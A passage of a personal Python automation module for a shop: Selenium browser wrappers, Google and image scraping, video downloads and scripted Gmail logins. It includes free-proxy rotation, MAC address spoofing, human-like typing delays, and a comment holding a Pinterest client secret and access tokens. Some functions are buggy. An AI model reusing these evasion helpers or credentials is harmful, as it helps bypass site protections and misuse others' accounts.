os.system("pip install selenium==3.14.1 && sleep 2 && cd /Users/$USER/tavern/tavern && /Users/$USER/tavern/bin/python3.5 -c 'from soda.can import *; %s' ; sleep 10 && pip install selenium==2.53.1 && killall python3.5 ; killall python ; echo complete ; sleep 10" % (executable_string))
def get_ali_url(x):
return Get(Product,shop=Muta()().store_abbre,handle=x).ali_url
def get_all_chrome_urls():
return subprocess.getoutput("""osascript -e'set text item delimiters to linefeed' -e'tell app "Google Chrome 70" to url of tabs of window 1 as text'""").split("\n")
def get_one(_, *args, **kwargs):
__ = _
_ = _.objects.filter(**{a:v for a,v in kwargs.items() if "__range" not in a and not [i for i in __._meta.fields if i.name == a.split("__")[0] and type(i) == JSONField]})
if {a:v for a,v in kwargs.items() if "__range" not in a and [i for i in __._meta.fields if i.name == a.split("__")[0] and type(i) == JSONField]}:
_ = filter(_,**{a:v for a,v in kwargs.items() if "__range" not in a and [i for i in __._meta.fields if i.name == a.split("__")[0] and type(i) == JSONField]})
if args and not [i[0] for i in sum(key("children",args),[]) if [j for j in __._meta.fields if j.name == i[0] and type(j) == JSONField]]:
_ = _.filter(*args)
if args and [i[0] for i in sum(key("children",args),[]) if [j for j in __._meta.fields if j.name == i[0] and type(j) == JSONField]]:
_ = filter(_,*args)
for a,v in kwargs.items():
if "__range" in a:
field = a.split("__",1)[0]
for i in _:
setattr(i, field, Date(getattr(i, field)).dateobj )
class myList(list):
1
_ = myList([i for i in _ if Date(v[0]).dateobj<= getattr(i,field) <= Date(v[1]).dateobj ])
if type(_) == list:
class myList(list):
1
_ = myList(_)
n = lambda self, x: list(self)[x]
( bind3(_,len), bind3(_,n) )
_ = _[0]
return _
def get_us_ip_list():
try:
soup = BeautifulSoup(requests.get("https://free-proxy-list.net/").text)
soup.findAll("td")
x = key("text", soup.findAll("td"))
y = [i for i in x if i.count(".") == 3 or tryprocess(int, i) == 1]
proxy_list = ["%s:%s"%(i,j) for i,j in zip(y[0::2], y[1::2])]
if len(proxy_list) == 0:
q = redinput("redo/Error in My_Requests().set_proxies() | proxy_list == [] | check requests.get('http://www.free-proxy-list.net') ")
if q == "redo": return get_us_ip_list()
if random.randrange(1,3) == 1: proxy_list = list(tcer(proxy_list))
else: random.shuffle(proxy_list)
return proxy_list
except :
soup = BeautifulSoup(requests.get("http://www.idcloak.com/proxylist/free-us-proxy-list.html").text)
x = key("text", soup.findAll("td"))
y = []
for i in x:
try:
if i.count(".") == 3:
int(i.replace(".",""))
y.append(i)
else:
int(i)
y.append(i)
except:
pass
y = list(tcer(y))
proxy_list = []
for i,j in zip(y[0::2], y[1::2]):
proxy_list.append("%s:%s"%(i,j))
proxy_list = proxy_list
if random.randrange(1,3) == 1:
proxy_list = list(tcer(proxy_list))
else:
random.shuffle(proxy_list)
if len(proxy_list) == 0:
return get_us_ip_list()
return proxy_list
def killall_phantomjs():
os.system("killall .phantomjs phantomjs &>/dev/null")
def login_gmail(ss, username, password):
logout_gmail(ss)
ss.get("https://accounts.google.com/ServiceLogin/identifier?service=mail&passive=true&rm=false&continue=https%3A%2F%2Fmail.google.com%2Fmail%2F&ss=1&scc=1<mpl=default<mplcache=2&emr=1&osid=1&flowName=GlifWebSignIn&flowEntry=AddSession")
flexed = False
quas = ss.ffss("div", "aria-label", "Switch account")
if([] != quas):
flexed = True
if flexed == True:
trykeycall("click", quas); sp(10)
trykeycall("click", ss.ffsts("div", "Use another account")); sp(7)
1
trykeycall("send_keys", ss.fns("identifier"), username); sp(7)
trykeycall("click", ss.ffsts("span", "Next")); sp(4)
while("/pwd" not in ss.current_url):
time.sleep(1)
trykeycall("send_keys", ss.fns("password"), password); sp(7)
current_url = ss.current_url
trykeycall("click", ss.ffsts("span", "Next")); sp(7)
while(current_url == (lambda: ss.current_url)()):
time.sleep(1)
time.sleep(10)
if("/challenge" in ss.current_url):
OSA.display_dialog("Please fill in the six digit verification code. Then click OK in this prompt.", text_prompt = False)
trykeycall("click", ss.ffsts("span", "Next")); sp(6)
def logout_gmail(ss):
ss.get("https://accounts.google.com/Logout")
def query_google(q, pages):
urls = ["https://www.google.com/search?q={}&oq={}&start={}".format(q,q, i*10) for i in range(pages)]
print(urls)
x=[]
for idx, url in enumerate(urls):
print("getting page %s.." % idx)
try:soup = BeautifulSoup(requests.get(url).text)
except Exception as e: redprint("[query_google][%s]"%e); continue
results = re.findall(r'<a href="/url\?q=(.*?)"', str(soup))
for i in results:
if i not in x:
x.append(i)
time.sleep(2)
print("%s results so far" % len(x))
x1 = []
for url in x:
x1.append(url.split("&")[0])
return x1
def query_google_images(searches="", limit=20):
for i in searches.split(","):
rm(homepath("~/Documents/downloads"))
rm(homepath("~/Documents/photos/%s"%(i)))
os.chdir(homepath("~/Documents"))
os.system('googleimagesdownload --chromedriver ~/tavern/tavern/soda/.chromedriver -k """%s""" -l %s'%(i.strip(), limit))
os.system("mkdir ~/Documents/photos &>/dev/null")
os.system("""mv ./downloads/* /Users/$USER/Documents/photos/ && mv ./downloads/*/* "/Users/$USER/Documents/photos/%s/" """%(i))
os.system("echo 'printing image folders in ~/Documents/photos..'")
os.system("ls -l ~/Documents/photos | grep -v 'jpg\|png\|jpeg\|psd'")
rm("./downloads")
return flatten([lmap(lambda x: homepath("~/Documents/photos/%s/%s"%(i,x)),os.listdir(homepath("~/Documents/photos/%s"%(i)))) for i in searches.split(",")],1)
def r_image_search(io,webbrowser_open=False):
import webbrowser
if type(io) != list:
io = [io]
def x(address):
multipart = {"encoded_image": open(address, "rb"), "image_content": ""}
response = requests.post("http://www.google.com/searchbyimage/upload", files=multipart, allow_redirects=False)
fetchUrl = response.headers["Location"]
url = fetchUrl + "&q=site%3Aaliexpress.com"
return url
l=pool(x,io,nodes=2).result()
if webbrowser_open == True:
if OSA.log("Are you sure you want to open the urls?",tp=False,buttons=["Yes","No"]) == "Yes":
lmap(webbrowser.open,l)
return l
def read_html(url, to_dict=True):
import pandas as pd
dataframes = pd.read_html(url, header=0)
dataframes=[dataframe_to_dictlist(dataframe) for dataframe in dataframes]if(1==to_dict)else(dataframes)
return dataframes
def reverse_image_search(io,search=None):
try:
# for segmentation fault
if not os.path.exists(io):
io = Images().download(io)
# filePath = '/mnt/Images/test.png'
searchUrl = 'http://www.google.com/searchbyimage/upload'
multipart = {'encoded_image': (io, open(io, 'rb')), 'image_content': ''}
response = requests.post(searchUrl, files=multipart, allow_redirects=False)
url = response.headers['Location']
if search:
url = url + "&q=%s&oq=%s"%(search,search)
return url
except Exception as e:
OSA.notify("reverse image search error: %s" % str(e))
return reverse_image_search(io=io,search=search)
def run_pinterest_board_image_getter():
# 'https://api.pinterest.com/oauth/?scope=read_public,write_public&client_id=5066656475317842279&state=768uyFys&response_type=code&redirect_uri=https://localhost/auth/pinterest/callback\nhttps://localhost/auth/pinterest/callback?state=768uyFys&code=de928c1c929e5c05\n\n\ndata={"grant_type":"authorization_code",\n"client_id":5066656475317842279,\n"client_secret":"84a1b5a0d3c5fc58fdbf7238902330d042ff2dfcf997c3ee2013c0408b03bb8e",\n"code":"d2021af082c74329",}\nx=requests.post("https://api.pinterest.com/v1/oauth/token",data=data)\n#y=\'{"access_token": "An0Xs7HN42Vf6UlX72a-KVcHjQahFdfH1Ef4bCxGUGE4UkCxZwhtQDAAAsw9RlBjTAqAq3MAAAAA", "token_type": "bearer", "scope": ["read_public", "write_public", "read_private", "write_private", "read_write_all"]}\'\ndata = json.loads(x.text)\naccess_token = data["access_token"]\n\nhttps://api.pinterest.com/v1/boards/396035429671343708/pins/?access_token=An8K8wKh3MUU2SX8uNNQh4I42w_1FcKm1yR6NIlGJA_4Q6Ckiwj7gDAAAqv1RiQTFyGAsh0AAAAA&fields=id%2Clink%2Cnote%2Curl%2Cattribution%2Cboard\n\n\n\nparams = {"access_token":access_token,"fields":["image","note"]}\nr = requests.get("https://api.pinterest.com/v1/boards/whitetiger62/steampunk-girl/pins/",params=params)\nall_data = []\ndata = json.loads(r.text)\nall_data.extend(data["data"])\nwhile "next" in data.get("page",{}):\n r = requests.get(data["page"]["next"])\n data = json.loads(r.text)\n all_data.extend(data["data"])\n print(data)\n time.sleep(1)\n\n\nrequests.get("https://api.pinterest.com/v1/me/pins/?access_token=%s&fields=id,note&limit=1"%(access_token))\n\nrequests.get("https://api.pinterest.com/v1/boards/anapinskywalker/wanderlust/pins/?access_token=%s&limit=2&fields=id,link,counts,note"%(access_token))\n'
process(lambda:OSA.log("x=document.getElementsByTagName('img');y=x.length;l=[];for (i=0;i<y;i++) {l=l.concat(x[i].src);};console.log(l.length);copy(l.join());"))
datas = []
while True:
if pyperclip.paste() not in datas:
datas.append(pyperclip.paste())
if pyperclip.paste() == "end":
break
datas = listminus(datas,None)
datas = oset(flatten(lmap(lambda i:i.split(","),sudby(lambda i:i.endswith("jpg"),datas)),1))
datas = datas[1:]
datas = lmap(lambda i:re.sub("(https://i.pinimg.com/)\d+x(.*)","\\g<1>1200x\\g<2>",i),datas)
datas = [i for i in datas if re.findall("https://i.pinimg.com/\d+x\d+_RS",i) == []]
# file_links = pool(lambda i: Images().download(i),datas,nodes=24)
return datas
def site_speed_test(shop):
"""
In [4]: @timeit
...: def timed():
...: requests.get("https://%s"%Shop()(shop).Domain_Name)
...:
...:
In [5]: timed()
timeit: 2.1305429935455322, timed
In [6]: timed()
timeit: 0.7816150188446045, timed
"""
@timeit
def timed():
requests.get("https://%s"%Shop()(shop).Domain_Name)
timed()
return
def socket_connect_send(host_and_port=("data.pr4e.org", 80),url="http://data.pr4e.org/romeo.txt"):
import socket
mysock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
mysock.connect(host_and_port)
cmd = ("GET %s HTTP/1.0\r\n\r\n"%(url)).encode()
mysock.send(cmd)
while True:
data = mysock.recv(512)
if (len(data) < 1):
break
print(data.decode())
mysock.close()
def urllib_video_download(x):
import urllib
y = get_random_address(homepath("~/tavern/tavern/soda/dls")).mp4()
urllib.request.urlretrieve(x, y)
return y
def video_download(x):
print("Downloading Video")
timer = multiprocessing_process(lambda: [[OSA.notify(str(i)),time.sleep(1)] for i in range(WHILE_TRUE)])
y = get_random_address(homepath("~/tavern/tavern/soda/dls")).mp4()
timedretry(lambda: os.system("wget -O '%s' '%s'"%(y,x)),80)
tryprocess(lambda: timer.terminate())
return y
def youtube_downloader(y="asdf",z=20):
os.makedirs(homepath("~/Documents/%s"%(y)),exist_ok=True)
os.chdir(homepath("~/Documents/%s"%(y)))
x=getoutput("youtube-dl --get-title --get-url ytsearch%s:%s"%(z,y)).split("\n")
titles = x[0::3]
urls = x[2::3]
titles = lmap(lambda i: i.title(), titles)
x = []
for title, url in zip(titles, urls):
if ner_tagger(title):
pass
else:
cmd = "youtube-dl '%s' --output '%s.mp4' &"%(url,title)
print(cmd)
x.append(lambda: os.system("youtube-dl '%s' --output '%s.mp4' &"%(url,title)))
pool(lambda i: i.__call__(), x, nodes=5).result()
def change_mac_address():
mac_address = subprocess.getoutput("openssl rand -hex 6 | sed 's/\(..\)/\\1:/g; s/.$//'")
os.system("sudo ifconfig en0 ether %s"%(mac_address))
class Bowser(object):
def __call__(self, profile="sele", invis=False, window_index=None):
distinct_print("initializing profile %s" % profile)
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.firefox.firefox_profile import FirefoxProfile
from selenium.webdriver.firefox.firefox_binary import FirefoxBinary
from selenium.webdriver.common.keys import Keys, Keys as SHADOW
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.options import Options
from selenium.webdriver import ActionChains
from selenium import webdriver
from pyvirtualdisplay import Display
from selenium.webdriver.common.alert import Alert
from sys import platform
import selenium.webdriver.support.expected_conditions as EC
globals().update({a:v for a,v in Keys.__dict__.items() if not a.startswith("_")})
globals().update(locals())
wd = None
if invis == True:
display = Display(visible=0, size=(1024, 768)).start()
if profile == 'ph':
#@service_log_path somewhere else [2018.11.23 05:07 PM]
wd = webdriver.PhantomJS(os.path.expanduser('~/tavern/tavern/soda/.phantomjs'),service_log_path=homepath("~/tavern/tavern/soda/.ghostdriver.log"))
(wd.set_window_position(*GLOBAL_BROWSER_WINDOW_POSITION), wd.set_window_size(*GLOBAL_BROWSER_WINDOW_SIZE))
wd.profile = "sele" # false but slips
wd.driver_type = "phantomjs"
if 'ch' in profile:
# os.system("rm -rf '~/Library/Application Support/Google/Chrome/Profile 1000'")
os.system("killall Google\ Chrome\ 70&>/dev/null&")
options = webdriver.ChromeOptions()
options.add_argument("--no-sandbox")
options.add_argument("--user-data-dir=~/Library/Application Support/Google/Chrome/Profile 1000")
options.add_argument("disable-infobars")
options.add_argument('--disable-infobars')
options.add_argument("--disable-infobars")
os.system("rm -rf ~/Library/Application\ Support/Google/Chrome/Profile\ 1000/Cookies")
OSA().notify("initiating webdriver")
options.binary_location = '/Applications/Google Chrome 70.app/Contents/MacOS/Google Chrome'
options.add_argument("--disable-dev-shm-usage");
# killall "Google Chrome 70"
# options.add_argument('window-size=1200x600')
chromedriver = os.path.expanduser('~/tavern/tavern/soda/.chromedriver')
if '+' in profile:
rm(homepath("~/Library/Application Support/Google/Chrome/Profile 1000"))
options.add_argument('--headless')
if '/' in profile:
rm(homepath("~/Library/Application Support/Google/Chrome/Profile 1000"))
wd = webdriver.Chrome(executable_path=chromedriver, chrome_options=options)
(wd.set_window_position(*GLOBAL_BROWSER_WINDOW_POSITION), wd.set_window_size(*GLOBAL_BROWSER_WINDOW_SIZE))
wd.profile = profile
wd.driver_type = "chrome"
elif profile != 'ph':
try:
if platform == 'darwin':
profile_path = os.path.expanduser("~/Library/Application Support/Firefox/Profiles")
else:
profile_path = os.path.expanduser('~/.mozilla/firefox')
#options = Options()
#options.add_argument("--headless")
#options.set_headless(headless=True)
# 3.14.1, 65/61, 24
# 2.53.1, 46, 19? (24*)
# 46 ruled as screenshot savely and zoomable
executable_path = os.path.expanduser("~/tavern/tavern/soda/.geckodriver")
#firefox_profile = FirefoxProfile(os.path.expanduser("~/Library/Application Support/Firefox/Profiles") + "/" + [i for i in os.listdir(os.path.expanduser("~/Library/Application Support/Firefox/Profiles"))][0])
firefox_profile = FirefoxProfile(homepath("~/Library/Application Support/Firefox/Profiles/%s" % (( [i for i in os.listdir(os.path.expanduser("~/Library/Application Support/Firefox/Profiles")) if profile == "".join(i.split(".")[1:]) ][0] )) ))
#firefox_profile.set_preference('browser.download.dir', '/tmp')
firefox_profile.set_preference('browser.helperApps.neverAsk.saveToDisk', 'text/csv; charset=utf-8')
firefox_profile.set_preference('browser.helperApps.neverAsk.saveToDisk', 'text/json; charset=utf-8')
firefox_profile.set_preference('browser.helperApps.neverAsk.saveToDisk', 'text/plain; charset=utf-8')
firefox_profile.set_preference('browser.helperApps.neverAsk.saveToDisk', 'text/html; charset=utf-8')
firefox_profile.set_preference('browser.helperApps.neverAsk.saveToDisk', 'text/csv')
firefox_profile.set_preference('browser.helperApps.neverAsk.saveToDisk', 'text/json')
firefox_profile.set_preference('browser.helperApps.neverAsk.saveToDisk', 'text/plain')
firefox_profile.set_preference('browser.helperApps.neverAsk.saveToDisk', 'text/html')
firefox_profile.set_preference('browser.helperApps.neverAsk.saveToDisk', 'attachment/json')
firefox_profile.set_preference('browser.helperApps.neverAsk.saveToDisk', 'attachment/json; charset=utf-8')
firefox_profile.set_preference('browser.helperApps.neverAsk.saveToDisk', 'attachment/json;charset=utf-8')
firefox_binary = FirefoxBinary("/Applications/Firefox 46.app/Contents/MacOS/firefox-bin") # Make sure selenium is 3.8.0
# firefox_binary = FirefoxBinary("/Applications/Firefox 46.app/Contents/MacOS/firefox-bin") # Make sure selenium is 2.53.1
wd = webdriver.Firefox(executable_path=executable_path, firefox_profile=firefox_profile, firefox_binary=firefox_binary)if(invis!=66)else(webdriver.Firefox(executable_path=executable_path,firefox_profile=firefox_profile,firefox_binary=FirefoxBinary("/Applications/Firefox 46.app/Contents/MacOS/firefox-bin".replace("46","66")), log_path="/dev/null"))#,capabilities=capabilities)
(wd.set_window_position(*GLOBAL_BROWSER_WINDOW_POSITION), wd.set_window_size(*GLOBAL_BROWSER_WINDOW_SIZE))
wd.driver_type = "firefox"
# HERE IS THE PAYLOAD
#if invis: OSA().setforemostwindowarrangement("Firefox",0,0,0,0)
from selenium.webdriver.common.keys import Keys
wd.keys = Keys
except Exception as e:
print(e)
o = lambda self: [blueprint("imko_checker on"), setattr(self, "imko_checker", True), self][2]
k = lambda self: [blueprint("imko_checker off"), setattr(self, "imko_checker", False), self][2]
def imko(self, *args, part = 0):
return self
# [ Depreciatied]
if len(args) > 1: part = args[-1]
self.zoom_level()
if part == "on":
self.imko_checker = True
return self
elif part == "off":
self.imko_checker = False
return self
if args: return [[greenprint("Image compare test passed.")]if(True==[self.save_screenshot("%s/%s%s.png"%(homepath("~/tavern/tavern/soda/imqo"),addressurl(args[0],part=part),"_:compare:_")), ImageComp()("%s/%s"%(homepath("~/tavern/tavern/soda/imqo"), addressurl(args[0],part=part)), "%s/%s%s.png"%(homepath("~/tavern/tavern/soda/imqo"),addressurl(args[0],part=part),"_:compare:_"))][1] )else([greenprint("Image compare test failed."), OSA.display_dialog("This page with url:\n%s\n failed the image compare test. It may have been changed.\nThis test was taken with a similarity metric of %s.\n\nContinue? (may result in program crash)" % (self.current_url, GLOBAL_IMAGE_COMPARISON_TEST_SCORE), text_prompt = False)]), self][1]
address_current = addressurl(self.current_url, part = part)
address_imqo = homepath("~/tavern/tavern/soda/imqo")
destination_locale = "%s/%s" % (address_imqo, address_current)
assert os.path.exists(destination_locale)
compare_locale = "%s%s.png" % (destination_locale, "_:compare:_") # gen new
self.save_screenshot(compare_locale) # save
image_compare_test_result = ImageComp()(destination_locale, compare_locale)
os.remove(compare_locale)
# :image_compare_test:
if True == image_compare_test_result:
greenprint("Image compare test passed.")
else:
greenprint("Image compare test failed.")
OSA.display_dialog("This page with url:\n%s\n failed the image compare test. It may have been changed.\nThis test was taken with a similarity metric of %s.\n\nContinue? (may result in program crash)" % (self.current_url, GLOBAL_IMAGE_COMPARISON_TEST_SCORE), text_prompt = False)
return self
def silver_port(self, executable_string):
os.system("pip install selenium==3.14.1 && cd ~/tavern/tavern && ~/tavern/bin/python3.5 -c 'from soda.can import *; %s' ; pip install selenium==2.53.1" % (executable_string))
return self
def set_window(self, x,y,l,w):
self.set_window_position(y, x)
self.set_window_size(l, w)
return self
def set_window_index(self, row, col, num_rows=4, num_cols=4):
self.get('http://google.com')
if self.profile == 'ch':
self.execute_script("document.body.style.zoom='25%'")
else:
self.zoom_out()
row_size = 4000/num_rows
col_size = 6400/num_cols
if self.profile == 'ch':
row_size = (row_size / 4) *1.2
if self.profile == 'ch':
col_size = (col_size / 4) *1.2
x_position = row_size * row
y_position = col_size * col
x_size = row_size
y_size = col_size
print(x_position, y_position, x_size, y_size)
self.set_window(x_position, y_position, y_size, x_size)
return self
def click_by_offset(self, element, x, y):
ActionChains(self).move_to_element_with_offset(element, x, y).click().perform()
return self
def cget(self,url):
self.execute_script("window.open('%s', 'new_window')"%url)
self.switchlast()
return self
def switchlast(self):
self.switch_to_window(self.window_handles[-1])
return self
def closelast(self):
self.switchlast()
self.close()
self.switchlast()
return self
def nexturlwait(self):
self.nexturlwait_current = self.current_url
return self
def nexturlwaitjoin(self, _time = GLOBAL_BROWSER_URLWAIT_WAIT_TIME):
start_time = datetime.now()
while self.current_url == self.nexturlwait_current:
if ((datetime.now()-start_time).seconds) > _time: assert(False)
time.sleep(0.5)
self.zoom_level(level = self.zoom_level_idx)
self.sp(GLOBAL_BROWSER_STEP_SLEEPTIME)
return self
def urlwait(self, x, _time = GLOBAL_BROWSER_URLWAIT_WAIT_TIME):
start_time = datetime.now()
while(x not in self.current_url):
if ((datetime.now()-start_time).seconds) > _time: assert(False)
time.sleep(0.5)
self.zoom_level(level = self.zoom_level_idx)
self.sp(GLOBAL_BROWSER_STEP_SLEEPTIME)
return self
def assert_connection_speed(self, minimum_speed = "25MB"):
minimum_speed_integer = decimal_re(minimum_speed)
download_speed_readable = Psutil().SpeedTest(download = True, upload = False, verbose = False)
download_speed_integer = decimal_re(download_speed_readable)
while download_speed_integer < minimum_speed_integer:
download_speed_readable = Psutil().SpeedTest(download = True, upload = False, verbose = False)
download_speed_integer = decimal_re(download_speed_readable)
OSA.display_dialog("Browser is not working because download speed is not over the minimum speed which is %s.\nPressing Okay will re-attempt this download speed test." % (minimum_speed))
greenprint("Download Speed, %s Is Over %s. Connection Speed Is Good" % (download_speed_readable, minimum_speed))
return True
if GLOBAL_BROWSER_REQUIRE_SPEEDTEST == True:
speedtest = pool(type("", (AttrDict,), dict(assert_connection_speed = assert_connection_speed))().assert_connection_speed, minimum_speed = "200MB")
def iframe_find(self, command, *args, **kwargs):
iframes = self.ftns("iframe")
for i in iframes:
try:
time.sleep(3)
self.switch_to_frame(i)
time.sleep(3)
except Exception as e:
redprint("could not switch to a frame, switching to default content and continuing.")
time.sleep(3)
self.switch_to_default_content()
time.sleep(3)
continue
pass
R = tryreturn(command, *args, **kwargs)
if R == 0:
print("could not execute the command with the args and kwargs, switching to default content and continuing.")
time.sleep(3)
self.switch_to_default_content()
time.sleep(3)
continue
elif R != 0:
time.sleep(3)
self.switch_to_default_content()
time.sleep(3)
return j
time.sleep(3)
self.switch_to_default_content()
time.sleep(3)
def wait_for(self, _type,_name,_time=GLOBAL_BROWSER_ELEMENT_WAIT_TIME):
try: return WebDriverWait(self,_time).until(EC.presence_of_element_located((getattr(By, _type), _name))); zz(2)
except: print('[Disregardable] %s Not Found'%_name); return 'fail'
def wait_fors(self, _type,_name,_time=GLOBAL_BROWSER_ELEMENT_WAIT_TIME):
try: return WebDriverWait(self,_time).until(EC.presence_of_all_elements_located((getattr(By, _type), _name))); zz(2)
except: print('[Disregardable] %s Not Found'%_name); return []
def wait_for_element(self, method, *args):
while True:
try:
x = method(*list(args))
if x != "fail":
return x
except Exception as e:
print(method, *args, "not found", "sleeping 1")
time.sleep(1)
# ie self.ss.fcn, "s-company-title"
# send_keys/click should be classed to return self
def bind_more(elem, webdriver = None):
if type(elem)==str: return "fail"
elem.find_element_by_class_name1 = elem.find_element_by_class_name
find_element_by_class_name = lambda self, x, **kwargs: [setitem(kwargs, "hotspot", bind_more(self.find_element_by_class_name1(x), webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
elem.find_element_by_css_selector1 = elem.find_element_by_css_selector
find_element_by_css_selector = lambda self, x, **kwargs: [setitem(kwargs, "hotspot", bind_more(self.find_element_by_css_selector1(x), webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
elem.find_element_by_id1 = elem.find_element_by_id
find_element_by_id = lambda self, x, **kwargs: [setitem(kwargs, "hotspot", bind_more(self.find_element_by_id1(x), webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
elem.find_element_by_link_text1 = elem.find_element_by_link_text
find_element_by_link_text = lambda self, x, **kwargs: [setitem(kwargs, "hotspot", bind_more(self.find_element_by_link_text1(x), webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
elem.find_element_by_name1 = elem.find_element_by_name
find_element_by_name = lambda self, x, **kwargs: [setitem(kwargs, "hotspot", bind_more(self.find_element_by_name1(x), webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
elem.find_element_by_partial_link_text1 = elem.find_element_by_partial_link_text
find_element_by_partial_link_text = lambda self, x, **kwargs: [setitem(kwargs, "hotspot", bind_more(self.find_element_by_partial_link_text1(x), webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
elem.find_element_by_tag_name1 = elem.find_element_by_tag_name
find_element_by_tag_name = lambda self, x, **kwargs: [setitem(kwargs, "hotspot", bind_more(self.find_element_by_tag_name1(x), webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
elem.find_element_by_xpath1 = elem.find_element_by_xpath
find_element_by_xpath = lambda self, x, **kwargs: [setitem(kwargs, "hotspot", bind_more(self.find_element_by_xpath1(x), webdriver = self)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
elem.find_elements_by_class_name1 = elem.find_elements_by_class_name
find_elements_by_class_name = lambda self, x, **kwargs: [setitem(kwargs, "hotspot", binded_list(self.find_elements_by_class_name1(x))(webdriver = webdriver)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
elem.find_elements_by_css_selector1 = elem.find_elements_by_css_selector
find_elements_by_css_selector = lambda self, x, **kwargs: [setitem(kwargs, "hotspot", binded_list(self.find_elements_by_css_selector1(x))(webdriver = webdriver)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
elem.find_elements_by_id1 = elem.find_elements_by_id
find_elements_by_id = lambda self, x, **kwargs: [setitem(kwargs, "hotspot", binded_list(self.find_elements_by_id1(x))(webdriver = webdriver)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
elem.find_elements_by_link_text1 = elem.find_elements_by_link_text
find_elements_by_link_text = lambda self, x, **kwargs: [setitem(kwargs, "hotspot", binded_list(self.find_elements_by_link_text1(x))(webdriver = webdriver)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
elem.find_elements_by_name1 = elem.find_elements_by_name
find_elements_by_name = lambda self, x, **kwargs: [setitem(kwargs, "hotspot", binded_list(self.find_elements_by_name1(x))(webdriver = webdriver)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
elem.find_elements_by_partial_link_text1 = elem.find_elements_by_partial_link_text
find_elements_by_partial_link_text = lambda self, x, **kwargs: [setitem(kwargs, "hotspot", binded_list(self.find_elements_by_partial_link_text1(x))(webdriver = webdriver)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
elem.find_elements_by_tag_name1 = elem.find_elements_by_tag_name
find_elements_by_tag_name = lambda self, x, **kwargs: [setitem(kwargs, "hotspot", binded_list(self.find_elements_by_tag_name1(x))(webdriver = webdriver)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
elem.find_elements_by_xpath1 = elem.find_elements_by_xpath
find_elements_by_xpath = lambda self, x, **kwargs: [setitem(kwargs, "hotspot", binded_list(self.find_elements_by_xpath1(x))(webdriver = webdriver)), self.batterypack.append(kwargs["hotspot"]), kwargs["hotspot"]][2]
elem.click1 = elem.click
click = lambda self, sleeptime = GLOBAL_BROWSER_STEP_SLEEPTIME: [elem.click1(), webdriver.sp(sleeptime), webdriver][2]
elem.send_keys1 = elem.send_keys
send_keys = lambda self, keys, sleeptime = GLOBAL_BROWSER_STEP_SLEEPTIME: [tryprocess(elem.clear), webdriver.sp(sleeptime), elem.send_keys1(keys), webdriver.sp(sleeptime), self][4]
elem.clear1 = elem.clear
s_keys = lambda self,x,r1=0.2,r2=0.8,sleeptime=GLOBAL_BROWSER_STEP_SLEEPTIME: [[tryprocess(elem.clear), time.sleep(sleeptime), time.sleep(1), [[elem.send_keys1(i), time.sleep(random.uniform(r1,r2))] for i in x]], self.sp(sleeptime), self][2]
"""
ss = Browser()("sele")
ss.get("google.com")
ss.fcss(".gLFyf").s_keys("RR")
"""
clear = lambda self: [elem.clear1(), self][1]
for k,v in locals().items():
try: bind(elem, k, v)
except: pass
for i in dir(webdriver):
if not i.startswith("_"):
if not i.startswith("find"):
if not i == "s_keys":
tryprocess(setattr, elem, i, tryreturn(getattr, webdriver, i))
# [don't do this, it sets the find_elements, wait, that uses ftn, etc, so none other collide]
return elem
"""
ss = Bowser()("ch")
ss.get("google.com")
a = ss.ftn("body")
assert ss == a.click()
"""
"""
ss = Browser()("sele")
ss.get("google.com").bat()
ss.ftns("input").ftns("input")
ss.bat("A", "B")
ss.batterypack
"""
actionitem = lambda self: self
bat = lambda self, *args, batterysleep_time = GLOBAL_BROWSER_STEP_SLEEPTIME: [setattr(self, "batterypack", []), setattr(self, "batterysleep", batterysleep_time), self][2] if len(args) == 0 else [[[self.batterypack[idx].click() if i=="Click" else self.nexturlwait() if i == "Nexturlwait" else self.nexturlwaitjoin() if i == "Nexturlwaitjoin" else () if i == Null else self.batterypack[idx].send_keys(i), self.sp(self.batterysleep)] for idx, i in enum(args)], self][1]
atomicdialog = lambda self, x, method: [OSA.display_dialog(x, text_prompt = False) if True == method() else 1, self][1]
binded_list = type("", (list,), dict(__call__ = lambda self, webdriver: [setattr(self, "ss", webdriver),self.ora(),(self)if(self!=["f","a","i","l"])else("fail")][2], click = lambda self, sleeptime = GLOBAL_BROWSER_STEP_SLEEPTIME: [binded_list(trykeycall("click", self))(webdriver = self.ss), self.sp(sleeptime)][0], send_keys = lambda self, keys, sleeptime = GLOBAL_BROWSER_STEP_SLEEPTIME: [trykeycall("clear", self), self.sp(sleeptime), binded_list(trykeycall("send_keys", self, keys))(webdriver = self.ss), self.sp(sleeptime)][2], s_keys = lambda self, keys, r1 = 0.2, r2 = 0.7, sleeptime = GLOBAL_BROWSER_STEP_SLEEPTIME: [[trykeycall("clear", self), self.sp(sleeptime), binded_list([[[tryprocess(elem.send_keys, i), time.sleep(random.uniform(r1, r2))][0] for i in keys] for elem in self])(webdriver = self)][2], self.sp(sleeptime)][0], clear = lambda self, sleeptime = GLOBAL_BROWSER_STEP_SLEEPTIME: [binded_list(trykeycall("clear", self))(webdriver = self.ss), self.sp(sleeptime)][0], ora = lambda self: [tryprocess(setattr, self, i, tryreturn(getattr, self.ss, i)) for i in dir(self.ss) if not i.startswith("_") and i != "s_keys"])) # could be just and i != "s_keys" # or... and i not in dir(self) # less risk
